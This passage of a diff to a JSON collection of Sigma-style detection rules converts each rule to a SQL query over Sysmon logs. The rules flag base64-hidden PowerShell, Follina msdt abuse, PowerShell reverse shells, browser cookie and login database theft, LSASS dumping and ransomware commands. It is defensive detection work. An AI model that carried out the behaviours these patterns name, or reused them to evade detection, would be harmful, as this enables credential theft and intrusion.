'%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE 
'%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the 
\"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" - }, - { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. 
As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative might use this function to check network connectivity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", - "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" - }, - { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate use of one of these tools" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 
'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 
'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1204" - ], - "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR 
CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { "title": "UAC Bypass via Event Viewer", 
@@ -14147,9757 +13759,9596 @@ "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Administrative activity" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": 
"7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
